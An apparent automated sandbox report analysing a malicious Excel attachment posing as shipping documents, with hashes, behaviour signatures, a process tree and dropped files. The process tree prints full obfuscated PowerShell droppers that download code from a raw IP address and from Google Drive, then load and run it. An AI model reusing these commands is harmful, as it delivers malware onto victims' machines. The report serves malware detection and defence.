Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    24-10-2024 09:55

General

  • Target

    Shipping Documents WMLREF115900.xls

  • Size

    98KB

  • MD5

    98502d8342f1afd8b699b26ff777a919

  • SHA1

    0d0c6a6f90611fee9c232d90fca0776dbbff5241

  • SHA256

    40bcfababa169393524d58a9447ea465ac7a18edd09ae9eaea2739c8d77dab9d

  • SHA512

    0d1e03166c7dc08098acaeace97930fdc7bfa5b50932bbb6ee151691202389f1d7d053c2d0b0a6248ecfa7a6056bd16a0ad2a61e91a6f03d292d7ace1d5e7e86

  • SSDEEP

    1536:MiqHy1S6F8b2SQrEkawpoXIow7yLHXXRD6G10u9QvuTUpx2MjeHmfDI7:UeFHrE2sIoeK3XR2GWumv6UprT

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Shipping Documents WMLREF115900.xls"
    1⤵
    • System Location Discovery: System Language Discovery
    • System Network Configuration Discovery: Internet Connection Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2792
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2488
    • C:\Windows\SysWOW64\WinDOWspOwershElL\v1.0\pOweRshEll.eXe
      "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2696
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1644
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w9tdqhou.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1968
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6356.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6355.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:816
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1892
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2304
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2272

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\807E68DC1EB352B6034064E6C5472B5E

    Filesize

    345B

    MD5

    048982a0b7545833aebb55d604f0b105

    SHA1

    95da2e6c4595d586f3f19fc5af9d13173f2ea530

    SHA256

    5051430635b887b0dbee43e640775ed52226dcb9e4efd89b216bfed8d5953b8b

    SHA512

    5bba8ff2c42028c0e3dbbbcd936f8f85e1872644ee7aab6213ee4f83455e9a9b6ada76c761348fcf3fd9c09ee5014b7b412b20b0961d61693340356067557118

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    9e0453d4c8fc60929a67f0a700432ad4

    SHA1

    838ab2727afeaec18e3853799104462fb0a25ec9

    SHA256

    05aacf10a35482e33383d998fec6b53b50b364738f48d81ef644bc165ce71331

    SHA512

    864db56ae0a2bb0ec1fb68a843c7d8b0fa0e53d9f6c736396116fd794e9398c7d8bb5b743500e18f19de067ab832aad2c81a158cd16edd889cd423f55957f741

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\807E68DC1EB352B6034064E6C5472B5E

    Filesize

    540B

    MD5

    734cebf03a9b5c9853fec5cb1ed53e0e

    SHA1

    826a6615405c9c8f840cb2b0e16c9d8ed5718bba

    SHA256

    6e4c475ace8a2886f66f120be3b52ccc30db5a18168181a8f4c5751e2c0d84eb

    SHA512

    7c4e8aba0a8c5750e86a79630661ebcce4dead66a45e5abefc9c655df9091665cb7ae03fc881c073b38155667076f33cb08dc552b16e83af224d4548854de5c3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    3c7652b3b71f9c929971f0f174885d37

    SHA1

    d2f64d17071d729ed984619e2ed1d169faf97b3d

    SHA256

    5b0700e5df09c9280366a7ebe7f019fd57ff1d06ac16051dfc42582b3e16f601

    SHA512

    e7e227617154b23e77f3f470938c7dee0d47cc37cf2585df00d27566e56fecdb4cf9653fae6c255cd10696425ffc46b066603f819887054ef7013e16aec86706

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\seethebestthingstobegoodwithhislifebestthigns[1].hta

    Filesize

    8KB

    MD5

    8982f3cebfb505e25210c0c87c44e85c

    SHA1

    ed37f6c6bef172b88a131315906788c3d689c5ae

    SHA256

    24b0841e3e7d18ecc226a3b4b4ff614d16c88c42dd25709680decb67111062b3

    SHA512

    1e35b6bbe89e7a7acbee229f40dde262f194ca12a3a290836cadc57d4c27a150495bc5e8bb9b157070920f6b74579d700603a60c81185a49af51c68a5528adab

  • C:\Users\Admin\AppData\Local\Temp\Cab5C43.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RES6356.tmp

    Filesize

    1KB

    MD5

    81e63dc4b3d7ac0cf88371761af5ae6d

    SHA1

    764c50fe8d7db8a4c880da97f5d6c207e682d64b

    SHA256

    b53256a770e690a125f91bf66d2b1f7f51feb1894bcebab3b969f5a568973d5a

    SHA512

    d58f86b29c1d7e17cf7c81aaa4f667e8891f1111f49a0666a1bb46933f6887cf9e7937b35303e971731cf702f3591ed16ea4a6b6e0a1c06a491bd316caeb1959

  • C:\Users\Admin\AppData\Local\Temp\w9tdqhou.dll

    Filesize

    3KB

    MD5

    a848c3c1a962e6dbd747ebec8048909d

    SHA1

    2a437bdea8f00841325304be657f93dba0255c9c

    SHA256

    6ca925ab04ef1e1e5469ce68fea53a768012f744ff4da38ee4b2da4678a54dac

    SHA512

    2101fa255367c055af44f4db0396b483cc57fa158ae798a731fedbf4ea34a2684ee3e6ac3ee10cd313abdab767f76b9176848cc034c5383755841fb29154d0b3

  • C:\Users\Admin\AppData\Local\Temp\w9tdqhou.pdb

    Filesize

    7KB

    MD5

    2f85e289f78b16e626cced86aaab5d9c

    SHA1

    bf6213c521db67125b403b8d57acca726149e25c

    SHA256

    95f5114ad990641583c0cef244bbf95a639fbf0dbebfc3edb836d107ede42603

    SHA512

    de5bcd3a34c191932d0ce987667bd7425424bd390c3385e10d2274ae7e3bfa475d9637e48294de08d38fb27f42f396f789ad2add03372103505da61aa55edfbf

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    ab8b8d107e5fc81334c7428f8a38cd62

    SHA1

    e7099e5f3aea7a37558cd5ec5c791dc51b3cef9f

    SHA256

    2c941ba1dcd7d03e35257db47d979336bf6cc4637da0485032b228a227f03190

    SHA512

    fa43e4af404770574791598b027f41faf0ddf1d5812f6b55500ced7f7f3c1638db159d0355bd0ba885dfa8aab2286fd14ef944419348a532b8d4d2a2c8ce6e5b

  • C:\Users\Admin\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS

    Filesize

    136KB

    MD5

    52a69ab69d1c871566791a3c06982607

    SHA1

    367845c8b76d602680ee6069f3bde95e02c350d9

    SHA256

    4f6090a3d6a848ae3ef2310caca02976fe8448fc21cbe357f4a28a88f34ead28

    SHA512

    681b60151ef27726f8b4c9c0949a8962fa8b16fe3583ba5ee4019831b6ac2ad5bf2562da0e8fc55cdec4cb10c59a608896b9be98bedd1a8bbde43b711ee2e0c2

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC6355.tmp

    Filesize

    652B

    MD5

    0cde4aae91aa3c317281ba08beb67bee

    SHA1

    b92c11d9c97dcf53e59587e70937d449f96e236a

    SHA256

    43429f669d530e6eeb1ebb20021bbd43604bf5e6c46a274e1c81d80b4160259a

    SHA512

    a4b2ff74a059e48cfc7451c08ba1e6b396687f6b29f5ac15a7ff7f1cac4f5d6a40733e56c666968761087b418bad4e3d0de4e19d95ddc298c9034bdf8392a266

  • \??\c:\Users\Admin\AppData\Local\Temp\w9tdqhou.0.cs

    Filesize

    469B

    MD5

    de4a3e7070e220b427d460a803bf2b1b

    SHA1

    f59c55466008ca3d557cc114c01395ba724a3a32

    SHA256

    0652da0455490eaf890ddcbc122a763d5f4031a9b2825d514d105bd8ea142eae

    SHA512

    afed9ff23e8f788d80f409856741bc68e985eb0092412f91e709d917fc37ea47e43b2560313195e5c0f8facc6232ddd74e5ca38c66d16af31d5f7b4984999b85

  • \??\c:\Users\Admin\AppData\Local\Temp\w9tdqhou.cmdline

    Filesize

    309B

    MD5

    750736d5b8f6958cb8096482d3050d91

    SHA1

    ee0bcb4f8b7810c15f20046d386d27591f6300cf

    SHA256

    7ca270b62382fa798c2d9798dab5d43d8caf692ff929718f6304962d1879de71

    SHA512

    bf51598b3f0dce4c846b484362841de87ea5f81c22d6dcd72ad7164be8bb53f58586b4ab68e6a395b2f71b6caf29d02dc30f5585ff459f1b19105a6a408391a6

  • memory/2488-18-0x00000000025E0000-0x00000000025E2000-memory.dmp

    Filesize

    8KB

  • memory/2792-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2792-19-0x0000000002D30000-0x0000000002D32000-memory.dmp

    Filesize

    8KB

  • memory/2792-1-0x0000000072CDD000-0x0000000072CE8000-memory.dmp

    Filesize

    44KB

  • memory/2792-77-0x0000000072CDD000-0x0000000072CE8000-memory.dmp

    Filesize

    44KB